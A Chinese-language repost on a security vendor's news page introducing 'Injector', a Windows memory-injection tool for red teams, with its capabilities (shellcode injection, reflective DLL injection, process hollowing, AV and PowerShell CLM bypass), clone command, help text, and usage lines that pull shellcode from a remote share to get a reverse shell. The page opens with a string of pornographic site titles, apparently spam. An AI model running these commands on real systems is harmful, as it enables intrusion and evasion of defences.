国产成人毛片毛片久久网_国产午夜激无码av毛片不_国产乱对白精彩在线播放_av资源站中文字幕_亚洲男人的天堂网站_国产成 人 综合 亚洲网_中国国产激情一区_少妇一级淫片免费放_亚洲一本大道av久在线播放_免费观看美女裸体网站

行業(yè)動(dòng)態(tài)

防御吧作為15年知名老牌域名服務(wù)商,CNNIC和CANN雙認(rèn)證域名注冊(cè)商,已經(jīng)
持續(xù)為500多萬個(gè)域名提供服務(wù),包括智能DNS/自由轉(zhuǎn)移/隱私保護(hù)等服務(wù)!
如何使用Injector實(shí)現(xiàn)Windows下的內(nèi)存注入
2021-09-13 13:56:54 【

關(guān)于Injector

Injector是一款功能齊全且強(qiáng)大的內(nèi)存注入工具,該工具集成了多種技術(shù),可以幫助紅隊(duì)研究人員實(shí)現(xiàn)在Windows系統(tǒng)下的內(nèi)存注入。

Injector能做什么?

針對(duì)遠(yuǎn)程服務(wù)器和本地存儲(chǔ)提供Shellcode注入支持。只需指定Shellcode文件,該工具將幫助我們完成后續(xù)的所有事情。默認(rèn)情況下,工具會(huì)將Shellcode注入至exe,如果沒有找到目標(biāo)進(jìn)程,它將會(huì)創(chuàng)建一個(gè)記事本進(jìn)程,并注入其中實(shí)現(xiàn)持久化感染。

  • 支持反射DLL注入,工具將下載DLL并注入遠(yuǎn)程進(jìn)程。

  • 通過exe實(shí)現(xiàn)進(jìn)程鏤空。

  • 使用-bypass參數(shù),以支持使用更高級(jí)的、未記錄的API來進(jìn)行進(jìn)程注入。

  • 支持加密的Shellcode,比如說AES加密或異或加密等。

  • 支持針對(duì)PowerShell的CLM繞過,可以直接將代碼存防止能夠執(zhí)行C#代碼的白名單文件夾中,比如說“C:\Windows\Tasks”。

  • 支持DLL鏤空,通過dll實(shí)現(xiàn)。

工具下載

廣大研究人員可以使用下列命令將該項(xiàng)目源碼克隆至本地:

  1. git clone https://github.com/0xDivyanshu/Injector.git

工具幫助

  1. C:\Users\admin>Injector.exe

  2. Help Options for Xenon:

  3. -m       Mode of operation

  4.        -m 1     Specifies the mode as Process injection

  5.        -m 2     Specifies the mode as Reflective DLL Injection

  6.        -m 3     Specifies the mode as Process Hollowing

  7.        -m 4     No injection! Give me my damn shell

  8.        -m 5     Powershell session via CLM bypass

  9.        -m 6     DLL hollowing

  10.  

  11. -TempFile        File location that your current user can read

  12. -shellcode       Use shellcode

  13. -dll     Use dll

  14. -decrypt-xor     Specify Xor decryption for shellcode

  15.         -pass   Specifty the password for Xor decryption

  16. -decrypt-aes     Specify aes decryption for shellcode

  17.         -pass   Specifty the password for aes decryption

  18. -location        Specify the location i.e either server or local

  19. -bypass         Uses enhance attempts to bypass AV

如需生成加密的Shellcode,請(qǐng)?jiān)贙ali下使用Helper.exe。

工具使用樣例

  1. Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass

上述命令將解密你的Shellcode并給你一個(gè)反向Shell。

如果你不想使用加密的Shellcode,你也可以直接使用下列命令運(yùn)行下列命令:

  1. Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt"

將其中的“-m=1”修改為“2,3,4,6”之后,就可以運(yùn)行其他模式了:

  1. Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt

上述命令將提供要給會(huì)話,我們可以使用它來執(zhí)行IEX cradle,并獲取一個(gè)能夠繞過CLM的反向Shell。

PowerShell

你還可以使用Invoke-Exe.ps1來通過PowerShel執(zhí)行Injector:

  1. Invoke-Exe -loc C:\Users\john\injector.exe


】【打印關(guān)閉】 【返回頂部
分享到QQ空間
分享到: 
上一篇ddos帶來的損失有哪些? 下一篇驗(yàn)證碼的歷史與黑產(chǎn)的糾葛

立足首都,輻射全球,防御吧專注云防御及云計(jì)算服務(wù)15年!

聯(lián)系我們

服務(wù)熱線:13051179500 18910191973
企業(yè)QQ:1245940436
技術(shù)支持:010-56159998
E-Mail:xihedata.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解決防御與加速) 版權(quán)所有 增值許可:京B2-20140042號(hào)
售前咨詢
公司總機(jī):18910191973
24小時(shí)電話:010-56159998
投訴電話:18910191973
值班售后/技術(shù)支持
售后服務(wù)/財(cái)務(wù)
備案專員
緊急電話:18610088800